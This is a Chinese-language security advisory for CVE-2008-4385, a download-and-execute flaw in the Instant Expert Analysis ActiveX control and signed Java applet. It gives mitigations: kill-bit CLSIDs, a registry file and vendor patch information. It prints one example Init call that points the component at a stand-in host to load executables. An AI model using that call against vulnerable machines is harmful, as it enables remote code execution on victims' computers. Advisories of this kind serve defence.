Instant Expert Analysis ActiveX控件任意代码下载和执行漏洞

BUGTRAQ ID: 31752
CVE(CAN) ID: CVE-2008-4385

Instant Expert Analysis允许站点通过单击方式快速分析用户的软硬件。

Instant Expert Analysis对Firefox或Netscape浏览器使用签名的Java Applet（SRLApplet.class，由sysreqlab2.jar或sysreqlab.jar提供），对Internet Explorer使用签名的ActiveX控件（sysreqlab.dll、sysreqlabsli.dll或sysreqlab2.dll）。

可能会以类似于以下的方式调用sysreqlab2.jar或sysreqlab2.cab的init方式：

document.SysReqLab.Init("http://www.example.com", "abc");

之后applet从http://www.systemrequirementslab.com 下载一个dll文件并执行。这个dll文件会从init方式开始的位置（如攻击者的站点）加载setup_abc.exe、setup_mz_abc.exe或setup_ie_abc.exe并执行这些可执行文件。

Husdawg, LLC Instant Expert Analysis
临时解决方法：

• 在Internet Explorer中禁用Instant Expert Analysis ActiveX控件，为以下CLSID设置kill bit：

{67A5F8DC-1A4B-4D66-9F24-A704AD929EEE}
{BE833F39-1E0C-468C-BA70-25AAEE55775E}
{BE833F39-1E0C-468C-BA70-25AAEE55775F}

或者将以下文本保存为.REG文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{67A5F8DC-1A4B-4D66-9F24-A704AD929EEE}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{BE833F39-1E0C-468C-BA70-25AAEE55775E}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{BE833F39-1E0C-468C-BA70-25AAEE55775F}]
"Compatibility Flags"=dword:00000400

厂商补丁：

Husdawg, LLC

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

<a href=“http://www.systemrequirementslab.com/” target=“_blank”>http://www.systemrequirementslab.com/</a>